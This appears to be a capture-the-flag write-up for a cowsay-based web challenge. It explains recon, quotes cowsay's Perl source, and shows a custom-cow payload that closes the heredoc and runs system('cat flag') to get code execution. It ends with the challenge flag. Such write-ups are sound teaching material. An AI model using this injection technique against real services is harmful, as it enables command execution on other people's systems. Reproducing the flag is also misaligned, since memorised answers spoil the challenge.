day 4 - mooo
'Moo may represent an idea, but only the cow knows.' - Mason Cooley
Recon
Presented a site that serves cow messages based on cowsay.
Either you type your message and select a cow from dropdown or you select cow designer mode where you can specify you own cow. cowsay doesn't allow specifying cows inline as a parameter so we guess it would be through the -f option for including a file.
custom cow designer
Observations:
@,{,},[,$, and]must be escaped with\.%00gives a failed message, same when you don't send a message but can be bypassed through url encoding, also entering hex values works (\xab)
cowsay
According the cowsay source you can open every file, like -f /etc/passwd. This works from the command line, if a file is not found it prints the message Could not find FILE cowfile!. However the webpage responses with No such cow!. Seems the web application does a check before parsing it to the command line.
From the source of cowsay:
my $f = $opts{'f'};
my $full = "";
if ($opts{'f'} =~ m,/,) {
$full = $opts{'f'};
} else {
for my $d (split(/:/, $cowpath)) {
if (-f "$d/$f") {
$full = "$d/$f";
last;
} elsif (-f "$d/$f.cow") {
$full = "$d/$f.cow";
last;
}
}
if ($full eq "") {
die "$progname: Could not find $f cowfile!\n";
}
}
do $full;
Code injection
Custom cow:
$thoughts ^__^
$thoughts ($eyes)\\_______
(__)\\ )\\/\\
$tongue ||----w |
|| ||
EOC
my $tongue = 'lol';
And for the flag:
$thoughts ^__^
$thoughts ($eyes)\\_______
(__)\\ )\\/\\
$tongue ||----w |
|| ||
EOC
system("cat flag");
flag
AOTW{th3_p3rl_c0w_s4ys_M0oO0o0O} _______
< Mooo! >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
le ||----w |
|| ||
Flag
AOTW{th3_p3rl_c0w_s4ys_M0oO0o0O}